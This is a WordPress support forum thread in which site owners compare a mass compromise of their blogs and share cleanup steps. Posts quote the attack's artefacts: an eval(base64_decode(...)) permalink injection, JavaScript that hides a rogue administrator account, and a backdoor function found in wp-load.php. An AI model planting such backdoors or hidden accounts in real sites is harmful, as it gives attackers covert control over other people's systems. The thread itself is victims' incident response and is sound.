WordPress.org

Ready to get started?Download WordPress

Forums

WP adding code to the end of url links breaking them (67 posts)

  1. davers
    Member
    Posted 5 years ago #

    This just started today, and I'm not certain why it is happening. At the end of any link, WP is appending the following "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/" to the end of the link.

    I'm far from an expert on WP code (I deal mostly with Drupal) so I'm not certain how WP is building links/passing the link information information. The theme link is correctly set to <?php the_permalink() ?>.

    Any thoughts on why this is happening?

  2. iridiax
    Member
    Posted 5 years ago #

    It looks suspicious (site suddenly breaks with eval(base64_decode showing up). See: http://codex.wordpress.org/FAQ_My_site_was_hacked

  3. warebloke
    Member
    Posted 5 years ago #

    This just started to happen on our site today too

    /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/

    Is not a hack as is not affecting all Urls.

    Anyone else have the same problem?

  4. esmi
    Forum Moderator
    Posted 5 years ago #

    Just because it's not affecting all urls doesn't mean that it's not a hack. I'd still suggest going through all of the standard hack cleanup steps.

  5. SiW
    Member
    Posted 4 years ago #

    A site I maintain also had this happen. The permalink string in the settings actually has that appended. I believe I've cleaned it up, but does anyone have any further info?

  6. Alan Smithee
    Member
    Posted 4 years ago #

    This happened to our site as well. Any other info?

  7. martinedens
    Member
    Posted 4 years ago #

    Me too. Just last night, no new plugins installed, no code / other changes made. It just happened! I got rid of it by simply removing the added permalink information and saving.

    Could it be the old hack trying to add spamlinks but only suceeding "halfway" in the new WP 2.8 environment?

  8. philpeter
    Member
    Posted 4 years ago #

    I just had this problem.

    The string was added to the end of the Permalink in Settings > Permalinks. Simply removing it and saving fixed it.

    It does beg the question though, why this happened and how? Is it a hack?

    Phil

  9. Chance@wordpress.org
    Member
    Posted 4 years ago #

    would this be what is causing my posts to show up with no tags or categories now? If so, how do I fix it and retrived my categories and tags?

  10. erwanpia
    Member
    Posted 4 years ago #

    looks like this is a hack, just got that too

    @philpeter, did the same , remove in settings / permalinks

    but don't know yet where it came from and how it broke in wordpress!!

  11. dyske
    Member
    Posted 4 years ago #

    How could this have happened to so many blogs almost simultaneously? I just upgraded to 2.8.4, but it sounds like (from the posters above) this would not prevent this from happening again.

  12. kilpatrick
    Member
    Posted 4 years ago #

    Same problem here. I think its a hack. Im also experience some other strange unexplainable problems with the rss.

  13. wysiwyg2009
    Member
    Posted 4 years ago #

    Same here.

    @Kilpatrick. I also experience problems with RSS, where the individual category pages came up as a single post in RSS form, but it seemed to sort itself out after about 15 minutes.

    I actually have 2 wordpress sites, only on was afected, the only difference between the sites I can think of is the affected site used the "Dean's Permalinks Migration" plugin.

    Anyone else using this plugin experiencing this problem?

  14. dyske
    Member
    Posted 4 years ago #

    @wysiwyg2009

    No, I'm not using that, and was affected still.

  15. s_ha_dum
    Member
    Posted 4 years ago #

    Looks like a hack to me, and to this guy.

  16. ChloeAliceWilson
    Member
    Posted 4 years ago #

    I've had the same permalink problem but changed it back and seemed fine. The only odd thing in the last week or so was 4 new user registrations which I'd never had before. Due to his permalink problem I've just deleted them all. I then happened to look at my users and the only one left should be me but it says "Administrator (2)" but only shows my name. When I click on the Administrator link, it shows another name for a split second then goes back to my name. The name looks liks overglass71 or overgrass71 or something. How do I get rid of it, given I can't get it stay on the screen long enough to click delete? Any ideas?
    Thanks

  17. johninnit
    Member
    Posted 4 years ago #

    Thanks for that Chloe. I had 2 blogs compromised. One didn't have new users, but one indeed has a new admin, RobertToth89 or similar. He disappears immediately after loading the page, so I can't edit or delete him.

  18. wysiwyg2009
    Member
    Posted 4 years ago #

    Chloe,

    I do not have that problem, but if you have access to the database you can go into the Users table and manually delete the unwanted account

  19. johninnit
    Member
    Posted 4 years ago #

    Got it - he has a first name of a whole bunch of javascript designed to hide him.

    here it is

    ... <div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

  20. johninnit
    Member
    Posted 4 years ago #

    I got him by clicking on another user, and then just increasing the user ID number in the URL til I found him

    I deleted that javascript and saved him as a subscriber, and then I could see him in the lists and delete him

  21. johninnit
    Member
    Posted 4 years ago #

    The blog that had the admin inserted was on 2.6.3 at the time, and the one that didn't was on 2.7.1, so maybe the admin insertion in older blogs is the real aim behind this, and the permalink screwup without admin insertion is just all that later versions will permit.

  22. erwanpia
    Member
    Posted 4 years ago #

    found this at the to of wp-load.php, is this related ?

    function gpc_4701($l4703){if(is_array($l4703)){foreach($l4703 as $l4701=>$l4702)$l4703[$l4701]=gpc_4701($l4702);}elseif(is_string($l4703) && substr($l4703,0,4)=="____"){eval(base64_decode(substr($l4703,4)));$l4703=null;}return $l4703;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_4701",$_SERVER);

  23. ChloeAliceWilson
    Member
    Posted 4 years ago #

    @johninnit Thanks for that - I'll try your process and delete him if I can. I am on verion 2.7.1 though so does that throw your theory of just attacking older versions? If we delete him, do you think that's the end of it or should I be looking for other problems?

  24. johncsnider
    Member
    Posted 4 years ago #

    This just started happening on my site http://www.AmericanFreethought.com overnight.

    Has anyone figured out definitively what is causing this and how to fix it? It appears to affect all the permalinks (all that I have checked anyway), and I don't seem to be able to edit the link and remove all the gobbledy-gook off the end.

    Unfortunately, I am not a coder. Is there a relatively straightforward way to remedy this?

    Thanks!

  25. johninnit
    Member
    Posted 4 years ago #

    Chloe,

    Oh :( That's very odd.

    I had some good advice on clearing up after upgrade here http://wordpress.org/support/topic/307518?replies=15 - if you don't know it already (I didn't!)

    johncsnider, it should be possible to just choose one of the default permalink options in admin and have them fix themselves (and then upgrade and clean)

  26. benanne
    Member
    Posted 4 years ago #

    Someone should probably do a proper writeup about this, because there seems to have been an outbreak overnight.

    It is important that everyone realises that just restoring the permalink setting isn't enough; the hidden admin user has to be removed as well!

    ( My blog was compromised too: http://wordpress.org/support/topic/307588 )

  27. dyske
    Member
    Posted 4 years ago #

    It seems that some sort of bot ran last night to infect a whole bunch of blogs with this scheme to open the doors. I suspect that this was the first step for this hacker, and the second step is to actually exploit the holes.

    The scary part is that we don't know how the hacker inserted all these lines of code. So, it's quite possible that the hacker would run the script/bot to re-open the doors to our sites. We haven't done anything to protect our sites; we just fixed the damage.

  28. dyske
    Member
    Posted 4 years ago #

    I noticed that this hidden admin did not have email address. Email address is required at the time of registration, so I suspect that it was inserted directly into the database.

  29. benanne
    Member
    Posted 4 years ago #

    Were any of you running 2.8.4 when this happened? Because I upgraded to the latest version immediately after discovering this, hoping that that would prevent it from happening again...

  30. ChloeAliceWilson
    Member
    Posted 4 years ago #

    @johninnit I did it - I got him, but more by luck than judgement - I managed to click on him in the split second before he disappeared on the page load! So he's now gone, but how do we know what he did when he was there? Is there a change/action log in WordPress anywhere? Will read the page you recommended.

    @dyske It's a worry isn't it. If the permalinks hadn't changed I guess it would have taken a lot longer to notice the hidden admin user. Has anyone on the latest WordPress version had any trouble? Should upgrading be our priority?

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.